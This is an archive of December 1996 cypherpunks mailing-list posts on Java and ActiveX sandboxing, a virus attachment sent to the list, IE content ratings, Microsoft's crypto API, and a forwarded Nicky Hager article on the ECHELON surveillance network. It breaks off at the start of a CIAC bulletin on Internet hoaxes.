To: "cypherpunks@toad.com>
Subject: RE: Securing ActiveX.
Message-ID: <01BBEC70.68E48680@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray wrote:
> And I'd be happier running the signed ActiveX control, written by Peter 
> Trie, or anyone else within a Sandbox regardless of signature as it 
> increases security.

We're in violent agreement here Ray.  Sandboxes are good, signed code 
is good, having both is very good.  We differ on the relative importance of
the two techniques but I suspect that is because we are coming from
different contexts.  My work is all intranet so the users trust the software
produced for them by definition.  Obviously the factors are different on
the net at large.
 
> The above says that you wouldn't want to run ActiveX in a sandbox while 
> you would want to run Java in a sandbox.  The difference between 
> technologies is that one runs native the other emulative.  I wouldn't 
> want to run ANY foreign code outside a sandbox.  Java or ActiveX.

It's not a Java vs ActiveX thing for me at all.  What is important is that
some of the applets I write can't function in a sandbox, they need access
to the disk and other resources for business reasons.  For this type of
thing signed code without a sandbox is the only choice.

What I'd really like is the sort of thing Bill Frantz is describing on 
another branch of this thread.  Signed code and an administrator 
defined policy that specified for a given signature exactly what 
types of resources should be accessible.  Anything from don't
execute and audit a security alarm to complete access to the
whole machine.
 
> The whole point of this was creating a distributed network of DES 
> crackers.

Yes, but in good cypherpunk fashion I've hijacked the original topic 
into a new direction. :-)

> > If you choose to run an unsigned control all bets are off.  On a related note,
> > I recently saw a Java implementation of a board game that recommended
> > the user download the zipped up .classes and run it locally.  How many
> > average users realize this would disable the Java sandbox entirely?
> 
> How many users know how to download the jdk and run the java vm locally?  

They don't need to.  All they need to do is unzip the java classes into their 
classpath and all of the normal restrictions on an applet are ignored.  
Think it would be very hard to persuade a user to do just that in order
to play a kewl java game?  More importantly it shows that even expert
users don't always know where the holes in the sandbox are.

regards,
-Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Tue, 17 Dec 1996 21:03:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The virus I got...
Message-ID: <961218000243_34679065@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Uh..... My question is WHO in gods name trusts a uuencoded file that small
especially from an address like that. Sounds like stupidity to me...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 18 Dec 1996 00:38:42 -0800 (PST)
To: blanc <blancw@cnw.com>
Subject: Re: permanent invasion of privacy
In-Reply-To: <01BBEC6B.95899C20@king1-23.cnw.com>
Message-ID: <32B7AD14.59F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


blanc wrote:
> From:   Dale Thorn
> It's noteworthy that not a single person on this list has looked at this
> from the children's point of view, considering that there are *many* of
> them who could use the extra help (albeit bad for parents).

> There have been discussions about this; just not lately.   The intent of
> many on this list is to get away from a dependence on the generosity of
> overruling governments.  If a child can be helped ("empowered") by the uses
> of encryption, then it is relevant to list discussion.

Not lately?  And why is that?  How is an abused child going to be helped
by encryption?

> Empathy with children is not borne of government, but of a normal state of
> mind.   The ability to help abused individuals, whether young or old, is
> not a capacity exclusive to government.

That's just rhetoric.  What normal state of mind?  I understand the
argument against "big government", but *coincidentally*, as government
has gotten bigger over the last 50 years or so, children's lives have
gotten much better.  It was common to have neighbors in a city 40 years
ago (I remember) who beat their kids so bad you could hear them several
houses away.  You don't hear that today.  Coincidence?

> If you go out to alt.philosophy.objectivism they'll be glad to discuss this
> with you in detail.

In other words, if it doesn't offer something for me, the selfish adult,
I don't wanna hear it.  You can't have just one side of the discussion,
because there are too many people like me around to remind you that there
is the other side too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 17 Dec 1996 22:02:27 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Microsoft IE may not work without censorship files
Message-ID: <01BBEC7E.FC7178F0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich writes:
> > It's good to see they make at least an attempt at preventing the
> > PICS filter from being turned off without a password.
> 
> True, but my point was stronger.
> 
> The program *will not work* if there have been even inadvertent changes
> to the self-censorship files. This person emailed me because he couldn't
> get it to work after an unrelated change.

My original response was really just meant as humor.  (The other
paragraph in particular.)  I'm of the school that ratings are a 
profoundly useless idea for their supposed purpose, and dangerous
in their possible misuse by the government.

> This sort of contradicts Microsoft's claims that they don't require
> ratings because they're turned off by default. If the file can't fix
> itself, I'd say that's not "default."

If a user randomly deletes parts of an application and it stops 
working I'm afraid the fault is entirely with the user.  Reinstalling
the damaged software would seem the obvious answer.

> Sorry, I didn't get the context across. Read it again alongside this: 
> 
> http://pathfinder.com/Netly/daily/961213.html

That article say in part, "Microsoft has indicated that future 
generations may well come out of the box with RSAC-i, by 
default, activated."  I follow Microsoft's strategy and 
announcements very closely and as far as I can tell this is
sheer fabrication.  The closest thing they've announced (and
shipped) is the IE Admin Kit that lets a corporation build
a custom version of IE with the settings to their liking.  I can't
find any fault with that.

regards
-Blake (who's played apologist to Rich's MS-bashing before)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cygnus.com>
Date: Tue, 17 Dec 1996 22:14:14 -0800 (PST)
To: roy@scytale.com
Subject: Re: [NOT NOISE] Microsoft Crypto Service Provider API
In-Reply-To: <961217.193402.3q9.rnr.w165w@sendai.scytale.com>
Message-ID: <t53u3pkpehe.fsf@rover.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


roy@sendai.scytale.com (Roy M. Silvernail) writes:

>> I just got my copy of the Microsoft Cryptographic Service Provider
>> Development Kit, Version 1.0.  It appears to support only Windows NT.  A
>> first glance reveals no built-in GAK (but I haven't examined it closely
>> yet!).

You're right, you haven't looked at it closely.  Although it doesn't
have Key Escrow, new cryptosystems can only be added if they are
signed by a private key held by Microsoft.  Of course, Microsoft has
agreed with the State Dept. to sign only export-"strength" crypto.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamie@comet.net (jamie dyer)
Date: Tue, 17 Dec 1996 22:22:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Echelon: The Global Surveillance System (fwd)
Message-ID: <Pine.BSF.3.95.961218012009.15593E-100000@atlas.comet.net>
MIME-Version: 1.0
Content-Type: text/plain


Found this on another mailing list.
jkd
--------------------------------------------------------

EXPOSING THE GLOBAL SURVEILLANCE SYSTEM 
by Nicky Hager

------ The article as it appears in hard copy in the magazine also includes
the following sidebars: --"NSA'S BUSINESS PLAN: GLOBAL ACCESS" by Duncan
Campbell --GREENPEACE WARRIOR: WHY NO WARNING? and --NZ's PM Kept in the
Dark by Nicky Hager

********Hager's book "secret Power" is available from CAQ for $33.*******
 -----------
[See end]

IN THE LATE 1980S, IN A DECISION IT PROBABLY REGRETS, THE US PROMPTED
NEW ZEALAND TO JOIN A NEW AND HIGHLY SECRET GLOBAL INTELLIGENCE
SYSTEM. HAGER'S INVESTIGATION INTO IT AND HIS DISCOVERY OF THE ECHELON
DICTIONARY HAS REVEALED ONE OF THE WORLD'S BIGGEST, MOST CLOSELY HELD
INTELLIGENCE PROJECTS. THE SYSTEM ALLOWS SPY AGENCIES TO MONITOR MOST
OF THE WORLD'S TELEPHONE, E-MAIL, AND TELEX COMMUNICATIONS.

For 40 years, New Zealand's largest intelligence agency, the
Government Communications Security Bureau (GCSB) the nation's
equivalent of the US National Security Agency (NSA) had been helping
its Western allies to spy on countries throughout the Pacific region,
without the knowledge of the New Zealand public or many of its highest
elected officials. What the NSA did not know is that by the late
1980s, various intelligence staff had decided these activities had
been too secret for too long, and were providing me with interviews
and documents exposing New Zealand's intelligence activities. Eventually,
more than 50 people who work or have worked in intelligence and
related fields agreed to be interviewed.

The activities they described made it possible to document, from the
South Pacific, some alliance-wide systems and projects which have been
kept secret elsewhere. Of these, by far the most important is ECHELON.

Designed and coordinated by NSA, the ECHELON system is used to
intercept ordinary e-mail, fax, telex, and telephone communications
carried over the world's telecommunications networks. Unlike many of
the electronic spy systems developed during the Cold War, ECHELON is
designed primarily for non-military targets: governments, organizations, 
businesses, and individuals in virtually every country. It potentially
affects every person communicating between (and sometimes within)
countries anywhere in the world.

It is, of course, not a new idea that intelligence organizations tap
into e-mail and other public telecommunications networks. What was new
in the material leaked by the New Zealand intelligence staff was
precise information on where the spying is done, how the system works,
its capabilities and shortcomings, and many details such as the
codenames.

The ECHELON system is not designed to eavesdrop on a particular
individual's e-mail or fax link. Rather, the system works by
indiscriminately intercepting very large quantities of communications
and using computers to identify and extract messages of interest from
the mass of unwanted ones. A chain of secret interception facilities
has been established around the world to tap into all the major
components of the international telecommunications networks. Some
monitor communications satellites, others land-based communications
networks, and others radio communications. ECHELON links together all
these facilities, providing the US and its allies with the ability to
intercept a large proportion of the communications on the planet.

The computers at each station in the ECHELON network automatically
search through the millions of messages intercepted for ones
containing pre-programmed keywords. Keywords include all the names,
localities, subjects, and so on that might be mentioned. Every word of
every message intercepted at each station gets automatically searched
whether or not a specific telephone number or e-mail address is on the
list.

The thousands of simultaneous messages are read in "real time" as they
pour into the station, hour after hour, day after day, as the computer
finds intelligence needles in telecommunications haystacks.

SOMEONE IS LISTENING:  The computers in stations around the globe are
known, within the network, as the ECHELON Dictionaries. Computers that
can automatically search through traffic for keywords have existed
since at least the 1970s, but the ECHELON system was designed by NSA
to interconnect all these computers and allow the stations to function
as components of an integrated whole. The NSA and GCSB are bound
together under the five-nation UKUSA signals intelligence agreement. 
The other three partners all with equally obscure names are the
Government Communications Headquarters (GCHQ) in Britain, the
Communications Security Establishment (CSE) in Canada, and the Defense
Signals Directorate (DSD) in Australia.

The alliance, which grew from cooperative efforts during World War II
to intercept radio transmissions, was formalized into the UKUSA
agreement in 1948 and aimed primarily against the USSR. The five UKUSA
agencies are today the largest intelligence organizations in their
respective countries.  With much of the world's business occurring by
fax, e-mail, and phone, spying on these communications receives the
bulk of intelligence resources.  For decades before the introduction
of the ECHELON system, the UKUSA allies did intelligence collection
operations for each other, but each agency usually processed and
analyzed the intercept from its own stations.

Under ECHELON, a particular station's Dictionary computer contains not
only its parent agency's chosen keywords, but also has lists entered
in for other agencies. In New Zealand's satellite interception station
at Waihopai (in the South Island), for example, the computer has
separate search lists for the NSA, GCHQ, DSD, and CSE in addition to
its own. Whenever the Dictionary encounters a message containing one
of the agencies' keywords, it automatically picks it and sends it
directly to the headquarters of the agency concerned. No one in New
Zealand screens, or even sees, the intelligence collected by the New
Zealand station for the foreign agencies.  Thus, the stations of the
junior UKUSA allies function for the NSA no differently than if they
were overtly NSA-run bases located on their soil.

The first component of the ECHELON network are stations specifically
targeted on the international telecommunications satellites (Intelsats) 
used by the telephone companies of most countries. A ring of Intelsats
is positioned around the world, stationary above the equator, each
serving as a relay station for tens of thousands of simultaneous phone
calls, fax, and e-mail. Five UKUSA stations have been established to
intercept the communications carried by the Intelsats.

The British GCHQ station is located at the top of high cliffs above
the sea at Morwenstow in Cornwall. Satellite dishes beside sprawling
operations buildings point toward Intelsats above the Atlantic,
Europe, and, inclined almost to the horizon, the Indian Ocean. An NSA
station at Sugar Grove, located 250 kilometers southwest of
Washington, DC, in the mountains of West Virginia, covers Atlantic
Intelsats transmitting down toward North and South America. Another
NSA station is in Washington State, 200 kilometers southwest of
Seattle, inside the Army's Yakima Firing Center. Its satellite dishes
point out toward the Pacific Intelsats and to the east. *1

The job of intercepting Pacific Intelsat communications that cannot be
intercepted at Yakima went to New Zealand and Australia. Their South
Pacific location helps to ensure global interception. New Zealand
provides the station at Waihopai and Australia supplies the Geraldton
station in West Australia (which targets both Pacific and Indian Ocean
Intelsats). *2

Each of the five stations' Dictionary computers has a codename to
distinguish it from others in the network. The Yakima station, for
instance, located in desert country between the Saddle Mountains and
Rattlesnake Hills, has the COWBOY Dictionary, while the Waihopai
station has the FLINTLOCK Dictionary. These codenames are recorded at
the beginning of every intercepted message, before it is transmitted
around the ECHELON network, allowing analysts to recognize at which
station the interception occurred.

New Zealand intelligence staff has been closely involved with the
NSA's Yakima station since 1981, when NSA pushed the GCSB to
contribute to a project targeting Japanese embassy communications. 
Since then, all five UKUSA agencies have been responsible for
monitoring diplomatic cables from all Japanese posts within the same
segments of the globe they are assigned for general UKUSA monitoring.3
Until New Zealand's integration into ECHELON with the opening of the
Waihopai station in 1989, its share of the Japanese communications was
intercepted at Yakima and sent unprocessed to the GCSB headquarters in
Wellington for decryption, translation, and writing into UKUSA-format
intelligence reports (the NSA provides the codebreaking programs).

"COMMUNICATION" THROUGH SATELLITES The next component of the ECHELON
system intercepts a range of satellite communications not carried by
Intelsat.In addition to the UKUSA stations targeting Intelsat
satellites, there are another five or more stations homing in on
Russian and other regional communications satellites. These stations
are Menwith Hill in northern England; Shoal Bay, outside Darwin in
northern Australia (which targets Indonesian satellites); Leitrim,
just south of Ottawa in Canada (which appears to intercept Latin
American satellites); Bad Aibling in Germany; and Misawa in northern
Japan.

A group of facilities that tap directly into land-based telecommunications 
systems is the final element of the ECHELON system. Besides satellite
and radio, the other main method of transmitting large quantities of
public, business, and government communications is a combination of
water cables under the oceans and microwave networks over land. Heavy
cables, laid across seabeds between countries, account for much of the
world's international communications.. After they come out of the water
and join land-based microwave networks they are very vulnerable to
interception. The microwave networks are made up of chains of
microwave towers relaying messages from hilltop to hilltop (always in
line of sight) across the countryside. These networks shunt large
quantities of communications across a country. Interception of them
gives access to international undersea communications (once they
surface) and to international communication trunk lines across
continents. They are also an obvious target for large-scale
interception of domestic communications.

Because the facilities required to intercept radio and satellite
communications use large aerials and dishes that are difficult to hide
for too long, that network is reasonably well documented. But all that
is required to intercept land-based communication networks is a
building situated along the microwave route or a hidden cable running
underground from the legitimate network into some anonymous building,
possibly far removed. Although it sounds technically very difficult,
microwave interception from space by United States spy satellites also
occurs.4 The worldwide network of facilities to intercept these
communications is largely undocumented, and because New Zealand's GCSB
does not participate in this type of interception, my inside sources
could not help either.

NO ONE IS SAFE FROM A MICROWAVE: A 1994 expos of the Canadian UKUSA
agency, Spyworld, co-authored by one of its former staff, Mike Frost,
gave the first insights into how a lot of foreign microwave interception
is done (see p. 18). It described UKUSA "embassy collection" operations, 
where sophisticated receivers and processors are secretly transported
to their countries' overseas embassies in diplomatic bags and used to
monitor various communications in foreign capitals. *5

Since most countries' microwave networks converge on the capital city,
embassy buildings can be an ideal site. Protected by diplomatic privilege,
they allow interception in the heart of the target country. *6 The Canadian
embassy collection was requested by the NSA to fill gaps in the American
and British embassy collection operations, which were still occurring in
many capitals around the world when Frost left the CSE in 1990. Separate
sources in Australia have revealed that the DSD also engages in embassy
collection. *7 On the territory of UKUSA nations, the interception of
land-based telecommunications appears to be done at special secret
intelligence facilities. The US, UK, and Canada are geographically well
placed to intercept the large amounts of the world's communications that
cross their territories.

The only public reference to the Dictionary system anywhere in the world
was in relation to one of these facilities, run by the GCHQ in central
London. In 1991, a former British GCHQ official spoke anonymously to
Granada Television's World in Action about the agency's abuses of power. He
told the program about an anonymous red brick building at 8 Palmer Street
where GCHQ secretly intercepts every telex which passes into, out of, or
through London, feeding them into powerful computers with a program known
as "Dictionary." The operation, he explained, is staffed by carefully
vetted British Telecom people: "It's nothing to do with national security.
It's because it's not legal to take every single telex. And they take
everything: the embassies, all the business deals, even the birthday
greetings, they take everything. They feed it into the Dictionary." *8
What the documentary did not reveal is that Dictionary is not just a
British system; it is UKUSA-wide.

Similarly, British researcher Duncan Campbell has described how the US
Menwith Hill station in Britain taps directly into the British Telecom
microwave network, which has actually been designed with several major
microwave links converging on an isolated tower connected underground
into the station.9

The NSA Menwith Hill station, with 22 satellite terminals and more than 4.9
acres of buildings, is undoubtedly the largest and most powerful in the
UKUSA network. Located in northern England, several thousand kilometers
from the Persian Gulf, it was awarded the NSA's "Station of the Year" prize
for 1991 after its role in the Gulf War. Menwith Hill assists in the
interception of microwave communications in another way as well, by serving
as a ground station for US electronic spy satellites. These intercept
microwave trunk lines and short range communications such as military
radios and walkie talkies. Other ground stations where the satellites'
information is fed into the global network are Pine Gap, run by the CIA
near Alice Springs in central Australia and the Bad Aibling station in
Germany. *10 Among them, the various stations and operations making up the
ECHELON network tap into all the main components of the world's
telecommunications networks. All of them, including a separate network of
stations that intercepts long distance radio communications, have their own
Dictionary computers connected into ECHELON.

In the early 1990s, opponents of the Menwith Hill station obtained large
quantities of internal documents from the facility. Among the papers was a
reference to an NSA computer system called Platform. The integration of all
the UKUSA station computers into ECHELON probably occurred with the
introduction of this system in the early 1980s. James Bamford wrote at that
time about a new worldwide NSA computer network codenamed Platform "which
will tie together 52 separate computer systems used throughout the world.
Focal point, or `host environment,' for the massive network will be the NSA
headquarters at Fort Meade. Among those included in Platform will be the
British SIGINT organization, GCHQ." *11

LOOKING IN THE DICTIONARY: The Dictionary computers are connected via
highly encrypted UKUSA communications that link back to computer data
bases in the five agency headquarters. This is where all the intercepted 
messages selected by the Dictionaries end up. Each morning the specially 
"indoctrinated" signals intelligence analysts in Washington, Ottawa,
Cheltenham, Canberra, and Wellington log on at their computer terminals 
and enter the Dictionary system. After keying in their security
passwords, they reach a directory that lists the different categories
of intercept available in the data bases, each with a four-digit
code. For instance, 1911 might be Japanese diplomatic cables from
Latin America (handled by the Canadian CSE), 3848 might be political
communications from and about Nigeria, and 8182 might be any messages
about distribution of encryption technology.

They select their subject category, get a "search result" showing how
many messages have been caught in the ECHELON net on that subject, and
then the day's work begins. Analysts scroll through screen after
screen of intercepted faxes, e-mail messages, etc. and, whenever a
message appears worth reporting on, they select it from the rest to
work on. If it is not in English, it is translated and then written
into the standard format of intelligence reports produced anywhere
within the UKUSA network either in entirety as a "report," or as a
summary or "gist."

INFORMATION CONTROL: A highly organized system has been developed to
control what is being searched for by each station and who can have
access to it.  This is at the heart of ECHELON operations and works as
follows.

The individual station's Dictionary computers do not simply have a
long list of keywords to search for. And they do not send all the
information into some huge database that participating agencies can
dip into as they wish. It is much more controlled.

The search lists are organized into the same categories, referred to
by the four digit numbers. Each agency decides its own categories
according to its responsibilities for producing intelligence for the
network. For GCSB, this means South Pacific governments, Japanese
diplomatic, Russian Antarctic activities, and so on.

The agency then works out about 10 to 50 keywords for selection in
each category. The keywords include such things as names of people,
ships, organizations, country names, and subject names. They also
include the known telex and fax numbers and Internet addresses of any
individuals, businesses, organizations, and government offices that
are targets. These are generally written as part of the message text
and so are easily recognized by the Dictionary computers.

The agencies also specify combinations of keywords to help sift out
communications of interest. For example, they might search for
diplomatic cables containing both the words "Santiago" and "aid," or
cables containing the word "Santiago" but not "consul" (to avoid the
masses of routine consular communications). It is these sets of words
and numbers (and combinations), under a particular category, that get
placed in the Dictionary computers. (Staff in the five agencies called
Dictionary Managers enter and update the keyword search lists for each
agency.)

The whole system, devised by the NSA, has been adopted completely by
the other agencies. The Dictionary computers search through all the
incoming messages and, whenever they encounter one with any of the
agencies' keywords, they select it. At the same time, the computer
automatically notes technical details such as the time and place of
interception on the piece of intercept so that analysts reading it, in
whichever agency it is going to, know where it came from, and what it
is. Finally, the computer writes the four-digit code (for the category
with the keywords in that message) at the bottom of the message's
text. This is important. It means that when all the intercepted
messages end up together in the database at one of the agency
headquarters, the messages on a particular subject can be located
again. Later, when the analyst using the Dictionary system selects the
four- digit code for the category he or she wants, the computer simply
searches through all the messages in the database for the ones which
have been tagged with that number.

This system is very effective for controlling which agencies can get
what from the global network because each agency only gets the
intelligence out of the ECHELON system from its own numbers. It does
not have any access to the raw intelligence coming out of the system
to the other agencies. For example, although most of the GCSB's
intelligence production is primarily to serve the UKUSA alliance, New
Zealand does not have access to the whole ECHELON network. The access
it does have is strictly controlled. A New Zealand intelligence
officer explained: "The agencies can all apply for numbers on each
other's Dictionaries. The hardest to deal with are the Americans. ...
[There are] more hoops to jump through, unless it is in their interest, 
in which case they'll do it for you."

There is only one agency which, by virtue of its size and role within
the alliance, will have access to the full potential of the ECHELON
system the agency that set it up. What is the system used for? Anyone
listening to official "discussion" of intelligence could be forgiven
for thinking that, since the end of the Cold War, the key targets of
the massive UKUSA intelligence machine are terrorism, weapons
proliferation, and economic intelligence. The idea that economic
intelligence has become very important, in particular, has been
carefully cultivated by intelligence agencies intent on preserving
their post-Cold War budgets. It has become an article of faith in much
discussion of intelligence. However, I have found no evidence that
these are now the primary concerns of organizations such as NSA.

QUICKER INTELLIGENCE, SAME MISSION: A different story emerges after
examining very detailed information I have been given about the
intelligence New Zealand collects for the UKUSA allies and detailed
descriptions of what is in the yards-deep intelligence reports New
Zealand receives from its four allies each week. There is quite a lot
of intelligence collected about potential terrorists, and there is
quite a lot of economic intelligence, notably intensive monitoring of
all the countries participating in GATT negotiations. But by far, the
main priorities of the intelligence alliance continue to be political
and military intelligence to assist the larger allies to pursue their
interests around the world. Anyone and anything the particular
governments are concerned about can become a target.

With capabilities so secret and so powerful, almost anything goes. For
example, in June 1992, a group of current "highly placed intelligence
operatives" from the British GCHQ spoke to the London Observer: "We
feel we can no longer remain silent regarding that which we regard to
be gross malpractice and negligence within the establishment in which
we operate."  They gave as examples GCHQ interception of three
charitable organizations, including Amnesty International and
Christian Aid. As the Observer reported: "At any time GCHQ is able to
home in on their communications for a routine target request," the
GCHQ source said. In the case of phone taps the procedure is known as
Mantis. With telexes it is called Mayfly. By keying in a code relating
to Third World aid, the source was able to demonstrate telex "fixes"
on the three organizations. "It is then possible to key in a trigger
word which enables us to home in on the telex communications whenever
that word appears," he said. "And we can read a pre-determined number
of characters either side of the keyword."12 Without actually naming
it, this was a fairly precise description of how the ECHELON
Dictionary system works. Again, what was not revealed in the publicity
was that this is a UKUSA-wide system. The design of ECHELON means that
the interception of these organizations could have occurred anywhere
in the network, at any station where the GCHQ had requested that the
four-digit code covering Third World aid be placed.

Note that these GCHQ officers mentioned that the system was being used
for telephone calls. In New Zealand, ECHELON is used only to intercept
written communications: fax, e-mail, and telex. The reason, according
to intelligence staff, is that the agency does not have the staff to
analyze large quantities of telephone conversations.

Mike Frost's expos of Canadian "embassy collection" operations
described the NSA computers they used, called Oratory, that can
"listen" to telephone calls and recognize when keywords are
spoken. Just as we can recognize words spoken in all the different
tones and accents we encounter, so too, according to Frost, can these
computers. Telephone calls containing keywords are automatically
extracted from the masses of other calls and recorded digitally on
magnetic tapes for analysts back at agency headquarters. However, high
volume voice recognition computers will be technically difficult to
perfect, and my New Zealand-based sources could not confirm that this
capability exists. But, if or when it is perfected, the implications
would be immense. It would mean that the UKUSA agencies could use
machines to search through all the international telephone calls in
the world, in the same way that they do written messages. If this
equipment exists for use in embassy collection, it will presumably be
used in all the stations throughout the ECHELON network. It is yet to
be confirmed how extensively telephone communications are being
targeted by the ECHELON stations for the other agencies.

The easiest pickings for the ECHELON system are the individuals,
organizations, and governments that do not use encryption. In New
Zealand's area, for example, it has proved especially useful against
already vulnerable South Pacific nations which do not use any coding,
even for government communications (all these communications of New
Zealand's neighbors are supplied, unscreened, to its UKUSA allies). As
a result of the revelations in my book, there is currently a project
under way in the Pacific to promote and supply publicly available
encryption software to vulnerable organizations such as democracy
movements in countries with repressive governments. This is one
practical way of curbing illegitimate uses of the ECHELON
capabilities.

One final comment. All the newspapers, commentators, and "well placed
sources" told the public that New Zealand was cut off from US
intelligence in the mid-1980s. That was entirely untrue. The
intelligence supply to New Zealand did not stop, and instead, the
decade since has been a period of increased integration of New Zealand
into the US system. Virtually everything the equipment, manuals, ways
of operating, jargon, codes, and so on, used in the GCSB continues to
be imported entirely from the larger allies (in practice, usually the
NSA). As with the Australian and Canadian agencies, most of the
priorities continue to come from the US, too.

The main thing that protects these agencies from change is their
secrecy.  On the day my book arrived in the book shops, without prior
publicity, there was an all-day meeting of the intelligence
bureaucrats in the prime minister's department trying to decide if
they could prevent it from being distributed. They eventually
concluded, sensibly, that the political costs were too high. It is
understandable that they were so agitated.

Throughout my research, I have faced official denials or governments
refusing to comment on publicity about intelligence activities. Given
the pervasive atmosphere of secrecy and stonewalling, it is always
hard for the public to judge what is fact, what is speculation, and
what is paranoia.  Thus, in uncovering New Zealand's role in the
NSA-led alliance, my aim was to provide so much detail about the
operations the technical systems, the daily work of individual staff
members, and even the rooms in which they work inside intelligence
facilities that readers could feel confident that they were getting
close to the truth. I hope the information leaked by intelligence
staff in New Zealand about UKUSA and its systems such as ECHELON will
help lead to change.

CAQ SUBSCRIPTION INFORMATION: CAQ (CovertAction Quarterly) has won
numerous awards for investigative journalism. In 1996, it won 4 of
"Project Censored" top 25 awards for investigative reporting. CAQ is
read around the world by investigative reporters, activists, scholars,
intelligence buffs, news junkies, and anyone who wants to know the
news and analysis behind the soundbites and headlines. Recommended by
Noam Chomsky; targeted by the CIA.

Each article in the 64-page magazine, which is in its 19th year of
publication, is extensively footnoted and accompanied by photographs and
graphics.

For a single issue, send $6. A one year subscription: US $22; Canada/Mexico
$27; Latin America/Europe $33; Other areas $35. A two year US subscription
is $38

Please send check or money order in $US to: CAQ 1500 Massachusetts Ave.
#732 Washington, DC 20005, USA

Mail, phone or fax Mastercard or Visa with address info and expiration
date Phone: 202-331-9763 Fax: 202-331-9751 E-mail: caq@igc.org

CHECK OUT OUR WEB SITES: http://mediafilter.org/caq
http://www.worldmedia.com/caq

------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Assar Westerlund <assar@sics.se>
Date: Tue, 17 Dec 1996 16:43:12 -0800 (PST)
To: james@hotwired.com (James Glave)
Subject: Re: Ping of Death?
In-Reply-To: <v02140b03aedcc334a2e2@[204.62.132.92]>
Message-ID: <5lzpzc7kes.fsf@assaris.sics.se>
MIME-Version: 1.0
Content-Type: text/plain


james@hotwired.com (James Glave) writes:
> 
> Anyone heard of the Ping of Death, aka the Ping Bomb. It's a large chunk of
> hostile code, disguised as a mere ping, that can lead to server rebooting.

http://www.sophist.demon.co.uk/ping




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcus Watts <mdw@umich.edu>
Date: Tue, 17 Dec 1996 23:15:40 -0800 (PST)
To: coderpunks@toad.com
Subject: Re: Army Cryptanalysis manual online
In-Reply-To: <199612170634.BAA16798@quince.ifs.umich.edu>
Message-ID: <199612180715.CAA21298@quince.ifs.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Several people wrote to say (variously) that ghostscript could
deal with PDF, and that xpdf could also do the same.  In fact, I
did compile a version of ghostscript 2.6.4, a long time
back.  Unfortunately, it doesn't support PDF.  However, I
did find and successfully build xpdf 0.6, and so I have now managed to
view the PDF files, convert the thing into postscript, and to print
the results.  So,

	http://www.umich.edu/~umich/fm-34-40-2/

now has postscript, as well as PDF, and I also made .tar.gz
files of each.

The results I printed were certainly readable, but one caveat:
the whole thing is designed to be printed on two-sided paper (&
presumably bound), so some of the sections are supposed to start
on the back side of the sheet from the previous section.

				-Marcus Watts
				UM ITD PD&D Umich Systems Group




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Reece <reece@taz.nceye.net>
Date: Tue, 17 Dec 1996 19:00:14 -0800 (PST)
To: vincent@psnw.com
Subject: Re: The virus I got...
In-Reply-To: <199612180037.QAA09468@sierra.psnw.com>
Message-ID: <19961218025949.23374.qmail@taz.nceye.net>
MIME-Version: 1.0
Content-Type: text/plain


   Delivered-To: reece-cpunks@taz.nceye.net
   Delivered-To: reece@taz.nceye.net
   From: "Vincent Padua" <vincent@psnw.com>
   Date: Tue, 17 Dec 1996 16:41:57 -0800
   X-MSMail-Priority: Normal
   X-Priority: 3
   X-Mailer: Microsoft Internet Mail 4.70.1155
   MIME-Version: 1.0
   Content-Type: text/plain; charset=ISO-8859-1
   Content-Transfer-Encoding: 7bit
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   There was an e-mail sent to the list that had attached to it a virus.  Well
   lucky me I got.  It was a .com file that apparently turns your files into
   directories.  I can't boot into Win95 since it turned my HIMEM.SYS into a
   directory.  So, I seem to have fixed that, but now it says "access denied"
   and then prompts me with C:\>.  Did anyone else get it?  Has anyone heard
   or fixed this virus?

Yes.  It's a deadly mutation of the GOOD TIMES virus.

(People actually go to the trouble of stripping off the leading crap
from the uuencoded part and then *run a program* from someone called
Fuck@yourself.up? Furrfu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John H West <jwest@eskimo.com>
Date: Wed, 18 Dec 1996 03:10:04 -0800 (PST)
To: vincent@psnw.com>
Subject: Re: The virus I got...
In-Reply-To: <19961218025949.23374.qmail@taz.nceye.net>
Message-ID: <32B7D133.2E7C@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryan Reece wrote:
> 

>    There was an e-mail sent to the list that had attached to it a virus.  Well
>    lucky me I got.  It was a .com file that apparently turns your files into
>    directories.  I can't boot into Win95 since it turned my HIMEM.SYS into a
>    directory.  So, I seem to have fixed that, but now it says "access denied"
>    and then prompts me with C:\>.  Did anyone else get it?  Has anyone heard
>    or fixed this virus?
> 
> Yes.  It's a deadly mutation of the GOOD TIMES virus.
> 
> (People actually go to the trouble of stripping off the leading crap
> from the uuencoded part and then *run a program* from someone called
> Fuck@yourself.up? Furrfu.)

from CIAC,

   http://www-gsb.uchicago.edu/comp_svcs/hoax.html

>From ciac-bulletin@cheetah.llnl.gov  Wed Nov 20 22:14:26 1996
Date: Wed, 20 Nov 1996 20:12:41 -0800 (PST)
Reply-To: crawford@eek.llnl.gov
Originator: ciac-bulletin@cheetah.llnl.gov
Sender: ciac-bulletin@cheetah.llnl.gov
From: crawford@eek.llnl.gov (David Crawford)
To: khopper@midway.uchicago.edu
Subject: CIAC Bulletin H-05: Internet Hoaxes 
X-Listprocessor-Version: 6.0c -- ListProcessor by Anastasios Kotsikonas
Content-Length: 21794

-----BEGIN PGP SIGNED MESSAGE-----


             __________________________________________________________

                       The U.S. Department of Energy
                    Computer Incident Advisory Capability
                           ___  __ __    _     ___
